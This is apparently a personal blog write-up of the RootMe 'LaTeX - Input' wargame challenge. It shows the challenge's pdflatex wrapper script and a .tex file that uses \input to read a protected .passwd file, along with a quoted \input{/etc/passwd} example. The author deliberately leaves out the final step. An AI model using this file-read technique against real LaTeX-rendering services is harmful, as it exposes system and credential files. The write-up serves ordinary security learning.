일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
- christmas ctf
- hack
- 웹해킹
- h4cking game
- 2022 Fall GoN Open Qual CTF
- TeamH4C
- Wreckctf
- reversing
- got overwrite
- crypto
- 해킹
- ctf player
- Gon
- webhacking
- deayzl
- KAIST
- hacking
- python
- CTF
- Wargame
- writeup
- hacking game
- dreamhack
- pwnable
- webhacking.kr
- 워게임
- cryptography
- WEB
- Buffer Overflow
- System Hacking
- Today
- Total
deayzl's blog
[RootMe] LaTeX - Input 본문
There's no writeup for latex - input challenge found so I'm writing writeup. (This challenge is even 10 points easy one)
But i won't just let you know the full path to flag. I hope you struggle like i did.
#!/usr/bin/env bash
if [[ $# -ne 1 ]]; then
echo "Usage : ${0} TEX_FILE"
fi
if [[ -f "${1}" ]]; then
TMP=$(mktemp -d)
cp "${1}" "${TMP}/main.tex"
# Compilation
echo "[+] Compilation ..."
timeout 5 /usr/bin/pdflatex \
-halt-on-error \
-output-format=pdf \
-output-directory "${TMP}" \
-no-shell-escape \
"${TMP}/main.tex" > /dev/null
timeout 5 /usr/bin/pdflatex \
-halt-on-error \
-output-format=pdf \
-output-directory "${TMP}" \
-no-shell-escape \
"${TMP}/main.tex" > /dev/null
chmod u+w "${TMP}/main.tex"
rm "${TMP}/main.tex"
chmod 750 -R "${TMP}"
if [[ -f "${TMP}/main.pdf" ]]; then
echo "[+] Output file : ${TMP}/main.pdf"
else
echo "[!] Compilation error, your logs : ${TMP}/main.log"
fi
else
echo "[!] Can't access file ${1}"
fi
here's sourcecode, you can guess that if you give file name of some .tex file to this shell, it interprets your .tex file to create pdf using pdflatex. And you can find resources linked below then you can figure out that latex is some program that has a list of commands.
Hacking with LaTeX | Sebastian Neef - 0day.work
-no-shell-escape
Disable the \write18{command} construct, even if it is enabled in the texmf.cnf file.
-shell-restricted
Same as -shell-escape, but limited to a 'safe' set of predefined commands.
-shell-escape
Enable the \write18{command} construct. The command can be any shell command. This construct is normally disallowed for security reasons.
There's no-shell-escape flag on in that sourcecode. So I can't use \write18{}.
Reading files
All modes allow arbitrary files to be read from the filesystem. The easiest way is to use \input:
\input{/etc/passwd}
This will load the contents of the /etc/passwd file into the PDF file.
This seems like the right way to solve this challenge, cause the statement of this challenge was "Do you know how the input command works?".
Okay, then i think i gotta make a .tex file.
Creating a document in LaTeX - Overleaf, 온라인 LaTex 편집기
There's a simple code. Let's make file and add \input{} in /tmp/ directory.
\documentclass{article}
\begin{document}
\input{/challenge/app-script/ch23/.passwd}
\end{document}
This is the content of .tex file that i created.
./setuid-wrapper /tmp/myfile.tex
You gotta execute setuid-wrapper to execute ch23.sh with app-script-ch23-cracked permission.
Through this process, i created pdf file and i used scp command to bring that file to my computer.
Then I used evince to view my pdf file.
scp -P 2222 app-script-ch23@challenge02.root-me.org:/tmp/tmp.(randomname)/main.pdf ./
evince main.pdf
But my pdf file looked like
The flag is commented on the next line :
Did you get it ?
Well.. this is where i was stuck for like 3 or 4 hours. :(
This says the flag is commented. And I found that '%' (percent character) is the character for commenting.
Then I can guess like i need a function like ignoring special characters or escaping characters.
This is final step to get flag. Go search google about this. Then you can find something.
Add something to the .tex file, and run shell script again. You'll get flag.